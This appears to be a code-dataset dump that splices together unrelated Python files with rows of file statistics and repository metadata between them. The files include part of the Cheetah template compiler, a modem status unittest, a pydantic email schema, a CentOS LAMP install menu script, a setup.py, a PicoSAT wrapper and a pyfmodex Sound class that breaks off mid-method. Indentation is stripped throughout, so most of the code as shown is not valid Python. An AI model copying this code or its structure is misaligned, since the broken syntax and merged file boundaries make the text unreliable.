def _initializeSettings(self):
self.updateSettings(copy.deepcopy(DEFAULT_COMPILER_SETTINGS))
def _setupCompilerState(self):
self._activeClassesList = []
self._finishedClassesList = [] # listed by ordered
self._finishedClassIndex = {} # listed by name
self._moduleDef = None
self._moduleShBang = '#!/usr/bin/env python'
self._moduleEncoding = 'ascii'
self._moduleEncodingStr = ''
self._moduleHeaderLines = []
self._moduleDocStringLines = []
self._specialVars = {}
self._importStatements = [
"import sys",
"import os",
"import os.path",
"from os.path import getmtime, exists",
"import time",
"import types",
"import __builtin__",
"from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion",
"from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple",
"from Cheetah.Template import Template",
"from Cheetah.DummyTransaction import DummyTransaction",
"from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList",
"from Cheetah.CacheRegion import CacheRegion",
"import Cheetah.Filters as Filters",
"import Cheetah.ErrorCatchers as ErrorCatchers",
]
self._importedVarNames = ['sys',
'os',
'os.path',
'time',
'types',
'Template',
'DummyTransaction',
'NotFound',
'Filters',
'ErrorCatchers',
'CacheRegion',
]
self._moduleConstants = [
"try:",
" True, False",
"except NameError:",
" True, False = (1==1), (1==0)",
"VFFSL=valueFromFrameOrSearchList",
"VFSL=valueFromSearchList",
"VFN=valueForName",
"currentTime=time.time",
]
def compile(self):
classCompiler = self._spawnClassCompiler(self._mainClassName)
if self._baseclassName:
classCompiler.setBaseClass(self._baseclassName)
self._addActiveClassCompiler(classCompiler)
self._parser.parse()
self._swallowClassCompiler(self._popActiveClassCompiler())
self._compiled = True
self._parser.cleanup()
def _spawnClassCompiler(self, className, klass=None):
if klass is None:
klass = self.classCompilerClass
classCompiler = klass(className,
moduleCompiler=self,
mainMethodName=self.setting('mainMethodName'),
fileName=self._filePath,
settingsManager=self,
)
return classCompiler
def _addActiveClassCompiler(self, classCompiler):
self._activeClassesList.append(classCompiler)
def _getActiveClassCompiler(self):
return self._activeClassesList[-1]
def _popActiveClassCompiler(self):
return self._activeClassesList.pop()
def _swallowClassCompiler(self, classCompiler):
classCompiler.cleanupState()
self._finishedClassesList.append( classCompiler )
self._finishedClassIndex[classCompiler.className()] = classCompiler
return classCompiler
def _finishedClasses(self):
return self._finishedClassesList
def importedVarNames(self):
return self._importedVarNames
def addImportedVarNames(self, varNames):
self._importedVarNames.extend(varNames)
## methods for adding stuff to the module and class definitions
def setBaseClass(self, baseClassName):
if self._mainMethodNameArg:
self.setMainMethodName(self._mainMethodNameArg)
else:
self.setMainMethodName(self.setting('mainMethodNameForSubclasses'))
if self.setting('handlerForExtendsDirective'):
handler = self.setting('handlerForExtendsDirective')
baseClassName = handler(compiler=self, baseClassName=baseClassName)
self._getActiveClassCompiler().setBaseClass(baseClassName)
elif (not self.setting('autoImportForExtendsDirective')
or baseClassName=='object' or baseClassName in self.importedVarNames()):
self._getActiveClassCompiler().setBaseClass(baseClassName)
# no need to import
else:
##################################################
## If the #extends directive contains a classname or modulename that isn't
# in self.importedVarNames() already, we assume that we need to add
# an implied 'from ModName import ClassName' where ModName == ClassName.
# - This is the case in WebKit servlet modules.
# - We also assume that the final . separates the classname from the
# module name. This might break if people do something really fancy
# with their dots and namespaces.
chunks = baseClassName.split('.')
if len(chunks)==1:
self._getActiveClassCompiler().setBaseClass(baseClassName)
if baseClassName not in self.importedVarNames():
modName = baseClassName
# we assume the class name to be the module name
# and that it's not a builtin:
importStatement = "from %s import %s" % (modName, baseClassName)
self.addImportStatement(importStatement)
self.addImportedVarNames( [baseClassName,] )
else:
needToAddImport = True
modName = chunks[0]
#print chunks, ':', self.importedVarNames()
for chunk in chunks[1:-1]:
if modName in self.importedVarNames():
needToAddImport = False
finalBaseClassName = baseClassName.replace(modName+'.', '')
self._getActiveClassCompiler().setBaseClass(finalBaseClassName)
break
else:
modName += '.'+chunk
if needToAddImport:
modName, finalClassName = '.'.join(chunks[:-1]), chunks[-1]
#if finalClassName != chunks[:-1][-1]:
if finalClassName != chunks[-2]:
# we assume the class name to be the module name
modName = '.'.join(chunks)
self._getActiveClassCompiler().setBaseClass(finalClassName)
importStatement = "from %s import %s" % (modName, finalClassName)
self.addImportStatement(importStatement)
self.addImportedVarNames( [finalClassName,] )
def setCompilerSetting(self, key, valueExpr):
self.setSetting(key, eval(valueExpr) )
self._parser.configureParser()
def setCompilerSettings(self, keywords, settingsStr):
KWs = keywords
merge = True
if 'nomerge' in KWs:
merge = False
if 'reset' in KWs:
# @@TR: this is actually caught by the parser at the moment.
# subject to change in the future
self._initializeSettings()
self._parser.configureParser()
return
elif 'python' in KWs:
settingsReader = self.updateSettingsFromPySrcStr
# this comes from SettingsManager
else:
# this comes from SettingsManager
settingsReader = self.updateSettingsFromConfigStr
settingsReader(settingsStr)
self._parser.configureParser()
def setShBang(self, shBang):
self._moduleShBang = shBang
def setModuleEncoding(self, encoding):
self._moduleEncoding = encoding
self._moduleEncodingStr = '# -*- coding: %s -*-' %encoding
def getModuleEncoding(self):
return self._moduleEncoding
def addModuleHeader(self, line):
"""Adds a header comment to the top of the generated module.
"""
self._moduleHeaderLines.append(line)
def addModuleDocString(self, line):
"""Adds a line to the generated module docstring.
"""
self._moduleDocStringLines.append(line)
def addModuleGlobal(self, line):
"""Adds a line of global module code. It is inserted after the import
statements and Cheetah default module constants.
"""
self._moduleConstants.append(line)
def addSpecialVar(self, basename, contents, includeUnderscores=True):
"""Adds module __specialConstant__ to the module globals.
"""
name = includeUnderscores and '__'+basename+'__' or basename
self._specialVars[name] = contents.strip()
def addImportStatement(self, impStatement):
self._importStatements.append(impStatement)
#@@TR 2005-01-01: there's almost certainly a cleaner way to do this!
importVarNames = impStatement[impStatement.find('import') + len('import'):].split(',')
importVarNames = [var.split()[-1] for var in importVarNames] # handles aliases
importVarNames = [var for var in importVarNames if var!='*']
self.addImportedVarNames(importVarNames) #used by #extend for auto-imports
def addAttribute(self, attribName, expr):
self._getActiveClassCompiler().addAttribute(attribName + ' =' + expr)
def addComment(self, comm):
if re.match(r'#+$',comm): # skip bar comments
return
specialVarMatch = specialVarRE.match(comm)
if specialVarMatch:
# @@TR: this is a bit hackish and is being replaced with
# #set module varName = ...
return self.addSpecialVar(specialVarMatch.group(1),
comm[specialVarMatch.end():])
elif comm.startswith('doc:'):
addLine = self.addMethDocString
comm = comm[len('doc:'):].strip()
elif comm.startswith('doc-method:'):
addLine = self.addMethDocString
comm = comm[len('doc-method:'):].strip()
elif comm.startswith('doc-module:'):
addLine = self.addModuleDocString
comm = comm[len('doc-module:'):].strip()
elif comm.startswith('doc-class:'):
addLine = self.addClassDocString
comm = comm[len('doc-class:'):].strip()
elif comm.startswith('header:'):
addLine = self.addModuleHeader
comm = comm[len('header:'):].strip()
else:
addLine = self.addMethComment
for line in comm.splitlines():
addLine(line)
## methods for module code wrapping
def getModuleCode(self):
if not self._compiled:
self.compile()
if self._moduleDef:
return self._moduleDef
else:
return self.wrapModuleDef()
__str__ = getModuleCode
def wrapModuleDef(self):
self.addSpecialVar('CHEETAH_docstring', self.setting('defDocStrMsg'))
self.addModuleGlobal('__CHEETAH_version__ = %r'%Version)
self.addModuleGlobal('__CHEETAH_versionTuple__ = %r'%(VersionTuple,))
self.addModuleGlobal('__CHEETAH_genTime__ = %r'%time.time())
self.addModuleGlobal('__CHEETAH_genTimestamp__ = %r'%self.timestamp())
if self._filePath:
timestamp = self.timestamp(self._fileMtime)
self.addModuleGlobal('__CHEETAH_src__ = %r'%self._filePath)
self.addModuleGlobal('__CHEETAH_srcLastModified__ = %r'%timestamp)
else:
self.addModuleGlobal('__CHEETAH_src__ = None')
self.addModuleGlobal('__CHEETAH_srcLastModified__ = None')
moduleDef = """%(header)s
%(docstring)s
##################################################
## DEPENDENCIES
%(imports)s
##################################################
## MODULE CONSTANTS
%(constants)s
%(specialVars)s
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %%s. Templates compiled before version %%s must be recompiled.'%%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
%(classes)s
## END CLASS DEFINITION
if not hasattr(%(mainClassName)s, '_initCheetahAttributes'):
templateAPIClass = getattr(%(mainClassName)s, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(%(mainClassName)s)
%(footer)s
""" % {'header':self.moduleHeader(),
'docstring':self.moduleDocstring(),
'specialVars':self.specialVars(),
'imports':self.importStatements(),
'constants':self.moduleConstants(),
'classes':self.classDefs(),
'footer':self.moduleFooter(),
'mainClassName':self._mainClassName,
}
self._moduleDef = moduleDef
return moduleDef
def timestamp(self, theTime=None):
if not theTime:
theTime = time.time()
return time.asctime(time.localtime(theTime))
def moduleHeader(self):
header = self._moduleShBang + '\n'
header += self._moduleEncodingStr + '\n'
if self._moduleHeaderLines:
offSet = self.setting('commentOffset')
header += (
'#' + ' '*offSet +
('\n#'+ ' '*offSet).join(self._moduleHeaderLines) + '\n')
return header
def moduleDocstring(self):
if not self._moduleDocStringLines:
return ''
return ('"""' +
'\n'.join(self._moduleDocStringLines) +
'\n"""\n')
def specialVars(self):
chunks = []
theVars = self._specialVars
keys = theVars.keys()
keys.sort()
for key in keys:
chunks.append(key + ' = ' + repr(theVars[key]) )
return '\n'.join(chunks)
def importStatements(self):
return '\n'.join(self._importStatements)
def moduleConstants(self):
return '\n'.join(self._moduleConstants)
def classDefs(self):
classDefs = [str(klass) for klass in self._finishedClasses() ]
return '\n\n'.join(classDefs)
def moduleFooter(self):
return """
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=%(className)s()).run()
""" % {'className':self._mainClassName}
##################################################
## Make Compiler an alias for ModuleCompiler
Compiler = ModuleCompiler
| 39.631206 | 117 | 0.585323 | 7,017 | 78,232 | 6.403734 | 0.151917 | 0.03899 | 0.011617 | 0.008323 | 0.212462 | 0.170802 | 0.13297 | 0.110404 | 0.095249 | 0.081629 | 0 | 0.004518 | 0.301245 | 78,232 | 1,973 | 118 | 39.651292 | 0.817488 | 0.071723 | 0 | 0.248603 | 0 | 0.005587 | 0.170615 | 0.06223 | 0.000698 | 0 | 0 | 0 | 0.002793 | 0 | null | null | 0.010475 | 0.045391 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466a34ecb0421da1e44f26b4a2ebb96b4fc1273b | 1,267 | py | Python | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | 11 | 2019-02-07T16:13:59.000Z | 2021-08-14T03:53:14.000Z | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | null | null | null | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | 3 | 2019-02-07T16:14:09.000Z | 2021-08-14T05:09:17.000Z | # -*- coding: utf-8 -*-
import compat
import unittest
import sys
from plmn.utils import *
from plmn.results import *
from plmn.modem_cmds import *
from plmn.simple_cmds import *
class SimpleCmdChecks(unittest.TestCase):
def test_simple_status_cmd(self):
SimpleCmds.simple_status_cmd()
assert Results.get_state('Simple Status') is not None
def test_simple_status_get_reg_status(self):
SimpleCmds.simple_status_get_reg_status()
def test_simple_status_is_registered(self):
assert SimpleCmds.simple_status_is_registered() is True
def test_simple_status_is_home(self):
assert SimpleCmds.simple_status_is_home() is True
assert SimpleCmds.simple_status_is_roaming() is False
@unittest.skip('Skipping this test since this is only applicable in connected state')
def test_simple_status_is_connected(self):
assert SimpleCmds.simple_status_is_connected() is True
@unittest.skip('Skipping this as this is only applicable for Roaming scenario')
def test_simple_status_is_roaming(self):
assert SimpleCmds.simple_status_is_roaming() is True
if __name__ == '__main__':
nargs = process_args()
unittest.main(argv=sys.argv[nargs:], exit=False)
Results.print_results()
| 31.675 | 89 | 0.750592 | 174 | 1,267 | 5.132184 | 0.316092 | 0.18813 | 0.156775 | 0.12766 | 0.353863 | 0.206047 | 0.087346 | 0 | 0 | 0 | 0 | 0.000953 | 0.17206 | 1,267 | 39 | 90 | 32.487179 | 0.850334 | 0.016575 | 0 | 0 | 0 | 0 | 0.119775 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.214286 | false | 0 | 0.25 | 0 | 0.5 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466ccc900104e36f636478253e917a965c1df4d3 | 371 | py | Python | app/schemas/email.py | waynesun09/notify-service | 768a0db264a9e57eecce283108878e24e8d3b740 | [
"MIT"
] | 5 | 2020-12-20T17:10:46.000Z | 2021-08-20T05:00:58.000Z | app/schemas/email.py | RedHatQE/notify-service | 579e995fae0c472f9fbd27471371a2c404d94f66 | [
"MIT"
] | 13 | 2021-01-07T14:17:14.000Z | 2022-01-05T20:36:36.000Z | app/schemas/email.py | RedHatQE/notify-service | 579e995fae0c472f9fbd27471371a2c404d94f66 | [
"MIT"
] | 1 | 2022-01-06T22:21:09.000Z | 2022-01-06T22:21:09.000Z | from typing import Optional, List
from pydantic import BaseModel, EmailStr
from . import result
class EmailBase(BaseModel):
email: Optional[EmailStr] = None
class EmailSend(EmailBase):
msg: str
class EmailResult(BaseModel):
pre_header: Optional[str] = None
begin: Optional[str] = None
content: List[result.Result]
end: Optional[str] = None
| 18.55 | 40 | 0.719677 | 45 | 371 | 5.911111 | 0.488889 | 0.12406 | 0.169173 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191375 | 371 | 19 | 41 | 19.526316 | 0.886667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466d4b83456bbb93d38bc63179c0f99d00a30a62 | 2,422 | py | Python | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | 3 | 2015-04-08T18:41:02.000Z | 2015-10-28T09:54:47.000Z | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | null | null | null | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: Alex -*-
from Centos6_Bit64 import *
from SystemUtils import *
# Checking version of OS should happened before menu appears
# Check version of CentOS
SystemUtils.check_centos_version()
# Clear screen before to show menu
os.system('clear')
answer = True
while answer:
print ("""
LAMP Deploy Script V: 0.1 for CentOS 6.5/6.6 64Bit:
---------------------------------------------------
1. Check version of your CentOS
2. Check Internet connection
3. Show me my local IP address
4. Open port 80 to Web
5. Show me my localhost name
------- LAMP for CentOS 6.x -----------
6. Install EPEL & IUS repository
7. Install Web Server - Apache
8. Install Database - MySQL
9. Install Language - PHP
10. Install LAMP in "One Click" - CentOS 6.x
11. Exit/Quit
""")
answer = input("Please make your choice: ")
if answer == 1:
os.system('clear')
print ('\nChecking version of the system: ')
SystemUtils.check_centos_version()
elif answer == 2:
os.system('clear')
print ('\nChecking if you connected to the Internet')
SystemUtils.check_internet_connection()
elif answer == 3:
os.system('clear')
print ('\nYour local IP address is: ' + SystemUtils.check_local_ip())
elif answer == 4:
os.system('clear')
print('\nChecking firewall')
Centos6Deploy.iptables_port()
elif answer == 5:
print "Checking local hostname..."
SystemUtils.check_host_name()
elif answer == 6:
print ('\nInstalling EPEL and IUS repository to the system...')
Centos6Deploy.add_repository()
elif answer == 7:
print ('\nInstalling Web Server Apache...')
Centos6Deploy.install_apache()
elif answer == 8:
print ('\nInstalling database MySQL...')
Centos6Deploy.install_mysql()
elif answer == 9:
print('\nInstalling PHP...')
Centos6Deploy.install_php()
elif answer == 10:
print ('Install LAMP in "One Click" - CentOS 6.x')
Centos6Deploy.iptables_port()
Centos6Deploy.add_repository()
Centos6Deploy.install_mysql()
Centos6Deploy.install_php()
elif answer == 11:
print("\nGoodbye...\n")
answer = None
else:
print ('\nNot valid Choice, Try Again')
answer = True | 31.051282 | 77 | 0.604872 | 289 | 2,422 | 5 | 0.377163 | 0.069204 | 0.044983 | 0.049827 | 0.141869 | 0.040138 | 0.040138 | 0.040138 | 0 | 0 | 0 | 0.02905 | 0.260941 | 2,422 | 78 | 78 | 31.051282 | 0.778212 | 0.073906 | 0 | 0.261538 | 0 | 0 | 0.422699 | 0.022788 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.030769 | null | null | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466e8b57966faf4a0cc17febbe2a82c29fab5e61 | 802 | py | Python | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | null | null | null | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | 1 | 2019-10-16T14:00:25.000Z | 2019-11-11T16:23:20.000Z | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | 2 | 2017-05-15T06:03:27.000Z | 2019-07-21T09:04:24.000Z | from __future__ import absolute_import
from setuptools import setup
from txjsonrpc import meta
from txjsonrpc.util import dist
setup(
name=meta.display_name,
version=meta.version,
description=meta.description,
author=meta.author,
author_email=meta.author_email,
url=meta.url,
license=meta.license,
packages=dist.findPackages(meta.library_name),
long_description=dist.catReST(
"docs/PRELUDE.txt",
"README",
"docs/DEPENDENCIES.txt",
"docs/INSTALL.txt",
"docs/USAGE.txt",
"TODO",
"docs/HISTORY.txt",
stop_on_errors=True,
out=True),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python",
],
)
| 24.30303 | 50 | 0.63591 | 87 | 802 | 5.724138 | 0.551724 | 0.052209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001669 | 0.253117 | 802 | 32 | 51 | 25.0625 | 0.829716 | 0 | 0 | 0 | 0 | 0 | 0.229426 | 0.026185 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.137931 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466f047e17e0d6d7208910c763a4df77317279f9 | 4,596 | py | Python | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 233 | 2016-02-05T20:13:06.000Z | 2022-03-26T13:01:10.000Z | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 8 | 2017-12-20T17:07:58.000Z | 2020-08-06T15:44:55.000Z | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 15 | 2016-03-22T23:37:56.000Z | 2022-02-27T17:51:08.000Z | """Python wrapper around the _clibs PicoSAT extension."""
import os
from tt.errors.arguments import (
InvalidArgumentTypeError,
InvalidArgumentValueError)
if os.environ.get('READTHEDOCS') != 'True':
from tt._clibs import picosat as _c_picosat
VERSION = _c_picosat.VERSION
def sat_one(clauses, assumptions=None):
"""Find a solution that satisfies the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_one <tt.expressions.bexpr.BooleanExpression.sat_one>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: If solution is found, a list of ints representing the terms of
the solution; otherwise, if no solution found, ``None``.
:rtype: List[:class:`int <python:int>`] or ``None``
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Let's look at a simple example with no satisfiable solution::
>>> from tt import picosat
>>> picosat.sat_one([[1], [-1]]) is None
True
Here's an example where a solution exists::
>>> picosat.sat_one([[1, 2, 3], [-2, -3], [1, -2], [2, -3], [-2]])
[1, -2, -3]
Finally, here's an example using assumptions::
>>> picosat.sat_one([[1, 2, 3], [2, 3]], assumptions=[-1, -3])
[-1, 2, -3]
"""
try:
return _c_picosat.sat_one(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
def sat_all(clauses, assumptions=None):
"""Find all solutions that satisfy the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_all <tt.expressions.bexpr.BooleanExpression.sat_all>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: An iterator of solutions; if no satisfiable solutions exist, the
iterator will be empty.
:rtype: Iterator[List[:class:`int <python:int>`]]
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Here's an example showing the basic usage::
>>> from tt import picosat
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]]):
... print(solution)
...
[1, 2, 3, 4]
[1, 2, 3, -4]
[1, 2, -3, 4]
[1, 2, -3, -4]
[1, -2, 3, 4]
[1, -2, 3, -4]
We can cut down on some of the above solutions by including an assumption::
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]],
... assumptions=[-3]):
... print(solution)
...
[1, 2, -3, 4]
[1, 2, -3, -4]
"""
try:
return _c_picosat.sat_all(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
| 37.672131 | 79 | 0.650131 | 615 | 4,596 | 4.821138 | 0.239024 | 0.012816 | 0.014165 | 0.013491 | 0.715346 | 0.662057 | 0.662057 | 0.662057 | 0.649916 | 0.649916 | 0 | 0.020011 | 0.238903 | 4,596 | 121 | 80 | 37.983471 | 0.827616 | 0.766319 | 0 | 0.47619 | 0 | 0 | 0.019182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.142857 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4671817d5486f1ffa5048135771d27e1109e5cdd | 12,349 | py | Python | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | 1 | 2017-02-21T16:46:21.000Z | 2017-02-21T16:46:21.000Z | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | 1 | 2017-02-21T17:57:05.000Z | 2017-02-22T11:28:51.000Z | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | null | null | null | from .fmodobject import *
from .fmodobject import _dll
from .structures import TAG, VECTOR
from .globalvars import get_class
class ConeSettings(object):
def __init__(self, sptr):
self._sptr = sptr
self._in = c_float()
self._out = c_float()
self._outvol = c_float()
ckresult(_dll.FMOD_Sound_Get3DConeSettings(self._sptr, byref(self._in), byref(self._out), byref(self._outvol)))
@property
def inside_angle(self):
return self._in.value
@inside_angle.setter
def inside_angle(self, angle):
self._in = c_float(angle)
self._commit()
@property
def outside_angle(self):
return self._out.value
@outside_angle.setter
def outside_angle(self, angle):
self._out = c_float(angle)
self._commit()
@property
def outside_volume(self):
return self._outvol.value
@outside_volume.setter
def outside_volume(self, vol):
self._outvol = c_float(vol)
self._commit()
def _commit(self):
ckresult(_dll.FMOD_Sound_Set3DConeSettings(self._sptr, self._in, self._out, self._outvol))
class Sound(FmodObject):
def add_sync_point(self, offset, offset_type, name):
s_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_AddSyncPoint(self._ptr, offset, offset_type, name, byref(s_ptr)))
return s_ptr
def delete_sync_point(self, point):
ckresult(_dll.FMOD_Sound_DeleteSyncPoint(self._ptr, point))
@property
def threed_cone_settings(self):
return ConeSettings(self._ptr)
@property
def custom_rolloff(self):
"""Returns the custom rolloff curve.
:rtype: List of [x, y, z] lists.
"""
num = c_int()
self._call_fmod("FMOD_Sound_Get3DCustomRolloff", None, byref(num))
curve = (VECTOR * num.value)()
self._call_fmod("FMOD_Sound_Get3DCustomRolloff", byref(curve), 0)
return [p.to_list() for p in curve]
@custom_rolloff.setter
def custom_rolloff(self, curve):
"""Sets the custom rolloff curve.
:param curve: The curve to set.
:type curve: A list of something that can be treated as a list of [x, y, z] values e.g. implements indexing in some way.
"""
native_curve = (VECTOR * len(curve))(*[VECTOR.from_list(lst) for lst in curve])
self._call_fmod("FMOD_Sound_Set3DCustomRolloff", native_curve, len(native_curve))
@property
def _min_max_distance(self):
min = c_float()
max = c_float()
ckresult(_dll.FMOD_Sound_Get3DMinMaxDistance(self._ptr, byref(min), byref(max)))
return (min.value, max.value)
@_min_max_distance.setter
def _min_max_distance(self, dists):
ckresult(_dll.FMOD_Sound_Set3DMinMaxDistance(self._ptr, c_float(dists[0]), c_float(dists[1])))
@property
def min_distance(self):
return self._min_max_distance[0]
@min_distance.setter
def min_distance(self, dist):
self._min_max_distance = (dist, self._min_max_distance[1])
@property
def max_distance(self):
return self._min_max_distance[1]
@max_distance.setter
def max_distance(self, dist):
self._min_max_distance = (self._min_max_distance[0], dist)
@property
def _defaults(self):
freq = c_float()
vol = c_float()
pan = c_float()
pri = c_int()
ckresult(_dll.FMOD_Sound_GetDefaults(self._ptr, byref(freq), byref(vol), byref(pan), byref(pri)))
return [freq.value, vol.value, pan.value, pri.value]
@_defaults.setter
def _defaults(self, vals):
ckresult(_dll.FMOD_Sound_SetDefaults(self._ptr, c_float(vals[0]), c_float(vals[1]), c_float(vals[2]), vals[3]))
@property
def default_frequency(self):
return self._defaults[0]
@default_frequency.setter
def default_frequency(self, freq):
d = self._defaults
d[0] = freq
self._defaults = d
@property
def default_volume(self):
return self._defaults[1]
@default_volume.setter
def default_volume(self, vol):
d = self._defaults
d[1] = vol
self._defaults = d
@property
def default_pan(self):
return self._defaults[2]
@default_pan.setter
def default_pan(self, pan):
d = self._defaults
d[2] = pan
self._defaults = d
@property
def default_priority(self):
return self._defaults[3]
@default_priority.setter
def default_priority(self, pri):
d = self._defaults
d[3] = pri
self._defaults = d
@property
def format(self):
type = c_int()
format = c_int()
bits = c_int()
ckresult(_dll.FMOD_Sound_GetFormat(self._ptr, byref(type), byref(format), byref(bits)))
return so(type=type.value, format=format.value, bits=bits.value)
def get_length(self, ltype):
len = c_uint()
ckresult(_dll.FMOD_Sound_GetLength(self._ptr, byref(len), ltype))
return len.value
@property
def loop_count(self):
c = c_int()
ckresult(_dll.FMOD_Sound_GetLoopCount(self._ptr, byref(c)))
return c.value
@loop_count.setter
def loop_count(self, count):
ckresult(_dll.FMOD_Sound_SetLoopCount(self._ptr, count))
@property
def loop_points(self):
"""Returns tuple of two tuples ((start, startunit),(end, endunit))"""
start = c_uint()
